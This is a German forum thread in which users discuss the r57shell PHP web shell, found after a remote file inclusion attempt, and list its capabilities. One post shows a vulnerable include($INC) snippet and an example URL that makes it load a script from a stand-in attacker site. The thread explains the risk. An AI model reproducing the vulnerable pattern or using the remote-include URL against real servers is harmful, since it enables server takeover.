+ Antworten
Ergebnis 1 bis 14 von 14

Thema: r57shell

  1. #1
    BIN EIN KRASSA HELD!!!111 Avatar von robo47
    Registriert seit
    02.06.2005
    Ort
    weiher im tiefsten Odenwald
    Beiträge
    1.390

    Standard r57shell

    Ich bin da gerade zufällig darauf gestoßen, weil jemand versucht hat auf meiner Kiste ein paar Lücken von php-apps auszutesten, eins war ein include einer externen gif-datei! die sich als php-script entpuppte, das ganze ist ein recht nettes Script, nennt sich r57shell und bietet alles was der Hacker begehrt, hier mal ein Screenshot, die buttons werden wohl falsch dargestellt und so ein paar Kleinigkeiten, aber egal. Alles LOKAL getestet, nachdem ich das script angeschaut habe, paar sachen auskommentiert habe etc.

    Bietet:
    Mailversand
    Dateibrowser
    Dateisuche
    Datenbankzugriff (mysql, postgresql, mssql, oracle) [dumps erzeugen etc]
    Dateikomprimierung
    Auslesen der php.ini
    Anzeigen der phpinfo
    Dateien packen
    PHP-Code direkt ausführen können
    Dateien hochladen
    Dateien via ftp hochladen oder woandershinladen
    Versucht ob er an den gcc kommt und etwas kompilieren kann
    Verschiedene Versuche Scripte (perl + c++) auf nem port lauschen zu lassen (scheint ne Art Shell-Ersatz für Zugriff via Telnet oder ähnliches zu sein)

    Ich muss sagen, faszinierend was man in ca 58kb alles reinpacken kann, hab ihr auch schonmal solche tollen Einbruchsversuchscripte entdeckt ?

    Bild: http://www.robo47.net/public/r57shell/r57shell.png

  2. #2
    leftover when bar closes
    Registriert seit
    29.06.2006
    Ort
    Bern
    Beiträge
    123

    Standard

    Hier ein wenig ausführlicher: http://www.milw0rm.com/video/watch.php?id=29
    Unkraut ist die Opposition der Natur gegen die Regierung der Gärtner.

  3. #3
    Mensch Avatar von WarrenFaith
    Registriert seit
    17.08.2005
    Ort
    Berlin
    Beiträge
    1.675

    Standard

    Schon interessant das ganze....
    Rapid Android Development - droidnova.com
    I did it my way - Senseless-Blog
    Weihnachtsgeschenk? Schülern helfen - Bodypainting Kalender für 2009

  4. #4
    Blubb... öfz Avatar von ljungi
    Registriert seit
    16.03.2006
    Ort
    Berlin
    Beiträge
    433

    Standard

    Krass o.O
    Vive la France! Welcome to Sarkoworld...

  5. #5
    Erfahrener Benutzer Avatar von CIX88
    Registriert seit
    18.03.2005
    Beiträge
    709

    Standard

    Hab mir eben das Script von r57shell angeguckt, ist schon Hart !

  6. #6
    BIN EIN KRASSA HELD!!!111 Avatar von robo47
    Registriert seit
    02.06.2005
    Ort
    weiher im tiefsten Odenwald
    Beiträge
    1.390

    Standard

    Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :) das script auf dem server nutzbar und einem steht quasi alles offen.

  7. #7
    Erfahrener Benutzer Avatar von CIX88
    Registriert seit
    18.03.2005
    Beiträge
    709

    Standard

    Jo eben, einfach und genial gemacht ...

  8. #8
    Ben
    Ben ist offline
    Erfahrener Benutzer Avatar von Ben
    Registriert seit
    02.12.2004
    Ort
    Koblenz
    Beiträge
    4.815

    Standard

    Zitat Zitat von robo47 Beitrag anzeigen
    Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :)
    Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?

  9. #9
    BIN EIN KRASSA HELD!!!111 Avatar von robo47
    Registriert seit
    02.06.2005
    Ort
    weiher im tiefsten Odenwald
    Beiträge
    1.390

    Standard

    Zitat Zitat von Ben Beitrag anzeigen
    Zitat Zitat von robo47 Beitrag anzeigen
    Es zeigt eigentlich sehr gut was für potential hinter einer simplen include via http-lücke steckt :)
    Sorry, was für ein Satz! Vielleicht bin ich zu doof, habe mir das Skript auch nicht angeschaut, aber ... wie meinen?
    Es zeigt was man mit einem Script alles machen kann, wenn man jemanden findet der ein Script hat, wo man via http und nem parameter was includen kann, das in Kombination mit register_globals, kann z.b. so aussehen:

    script.php
    PHP-Code:
    <?php
    include($INC);
    ?>
    script.php?INC=http://www.boeseseite.de/boesesscript.xyz

    mfg
    robo47

  10. #10
    Ben
    Ben ist offline
    Erfahrener Benutzer Avatar von Ben
    Registriert seit
    02.12.2004
    Ort
    Koblenz
    Beiträge
    4.815

    Standard

    Ah,

  11. #11
    Mensch Avatar von WarrenFaith
    Registriert seit
    17.08.2005
    Ort
    Berlin
    Beiträge
    1.675

    Standard

    Mit " wäre das nicht passiert
    Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt :)
    Rapid Android Development - droidnova.com
    I did it my way - Senseless-Blog
    Weihnachtsgeschenk? Schülern helfen - Bodypainting Kalender für 2009

  12. #12
    BIN EIN KRASSA HELD!!!111 Avatar von robo47
    Registriert seit
    02.06.2005
    Ort
    weiher im tiefsten Odenwald
    Beiträge
    1.390

    Standard

    Zitat Zitat von WarrenFaith Beitrag anzeigen
    Mit " wäre das nicht passiert
    Es zeigt eigentlich sehr gut was für potential hinter einer simplen "include via http"-lücke steckt :)
    merke ich mir für nächstes mal.

  13. #13
    Erfahrener Benutzer Avatar von schifti
    Registriert seit
    06.12.2004
    Ort
    Bayern
    Beiträge
    198

    Standard

    und vorallem Joomla-Components sind davon betroffen natürlich nur mit register.... Ihr glaubt gar nicht, wieviele Usern täglich gehackt werden d.h. arbeiten
    Auch sehr beliebt ist die c99.

    Cool ist auch, wenn die Angreifer nichts ändern, aber eine Datei mit einem Redirect zu Maleware hinterlassen und die dann im Spam verlinken....

  14. #14
    Erfahrener Benutzer Avatar von CIX88
    Registriert seit
    18.03.2005
    Beiträge
    709

    Standard

    Hmmm, bin beim Googlen auf eine Seite gekommen, wo die Besitzer vermutlich noch gar nicht wissen, dass sie eine PHP-Datei mit dem r57shell auf ihren Server haben.

+ Antworten

Aktive Benutzer

Aktive Benutzer

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

     

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

Impressum · Tutorials · Nutzungsbedingungen · thematisch sortierte Linklisten · Spendenaufruf · Team · Partnerprojekte

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48